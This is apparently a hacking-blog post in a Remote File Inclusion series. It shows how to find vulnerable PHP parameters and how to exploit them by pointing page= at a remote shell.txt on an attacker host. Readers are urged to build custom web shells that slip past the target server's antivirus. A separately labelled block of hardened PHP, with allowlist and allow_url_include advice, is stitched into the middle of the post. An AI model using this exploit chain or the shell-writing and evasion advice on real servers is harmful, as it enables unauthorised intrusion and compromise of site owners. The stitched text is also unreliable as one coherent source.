Assalam-0-Alaikum,
Completing My Series:
- Beginning of RFI
- Finding And Exploiting RFI vulnerabilities
- Securing RFI vulnerabilities
Find RFI VULNERABILITIES
Here are a few examples of manipulating GET arguments:
www.site.com/index.php?id=1 → www.site.com/index.php?id=1asdfsaf
www.site.com/index.php?id=index → www.site.com/index.php?id=dumb
www.site.com/index.php?id=h4ck3r
Use your imagination... And for those who did not understand: the argument does not need to be "id" or "page" or "site". It can be anything.
There are more advanced versions of RFI, like POST argument RFI, and even cookie RFI, HTTP header RFI and so on. These should be easy to understand once you gain more knowledge about the HTTP protocol, TCP/IP, HTTP servers, PHP, etc.
Exploiting RFI Vulnerabilities
This is a very small but very effective exploit, and it is what the majority of hackers do.
Let's say that you have successfully found a vulnerable page. The URL is: www.site.com/index.php?page=index
The PHP script is written in such a way that we only need to change page=index to page=http://hacker.com/shell.txt, and our PHP code is pulled over to the victim's server and executed there.
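The include pattern the post is describing, shown beside a hardened version that maps the parameter to a fixed allowlist of local files. This is an added example, not code from the original post; the file names under pages/ are assumed.

```php
<?php
// Added example, not from the original post.
//
// Vulnerable form: whatever the client sends in ?page= goes straight into
// include(). If php.ini has allow_url_include=On, an http:// value in that
// parameter is fetched from the remote host and executed on this server.
function vulnerable_include(): void
{
    include $_GET['page'];   // attacker controls the path: do not use
}

// Hardened form: the request value is only ever used as a lookup key into a
// fixed allowlist. The user-supplied string is never part of a file path.
// (Assumed layout: the real pages live under ./pages/.)
const PAGES = [
    'index'   => __DIR__ . '/pages/index.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

// Returns the local path for a known page key, or null for anything else
// (remote URLs, traversal strings, typos). Unknown keys must never reach include().
function resolve_page(?string $page): ?string
{
    if ($page === null || !array_key_exists($page, PAGES)) {
        return null;
    }
    return PAGES[$page];
}

$target = resolve_page($_GET['page'] ?? 'index');
if ($target === null) {
    http_response_code(404);
    exit('Page not found');
}
include $target;
```

Even with the allowlist, keep allow_url_include=Off in php.ini (its default): that setting is what makes include() of an http:// path possible at all, and turning it off removes the remote half of the bug outright.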
What you should do now is try to make something called a shell. A shell is essentially just a PHP script that can perform Explorer-like actions: read/write/edit/create files, navigate folders, etc. Some shells even have built-in exploits to gain root access on the server, but that's another story.
Now, there is a truckload of premade shells out there, but I really recommend creating your own, as it is good learning and most shells are actually detected by antivirus software, believe it or not. So if the server you are trying to access has an antivirus, a premade shell will not work, and it might spoil your attack.
So what you do with it depends on you :p
Having confusion? Oh dear, ask me in the comments!!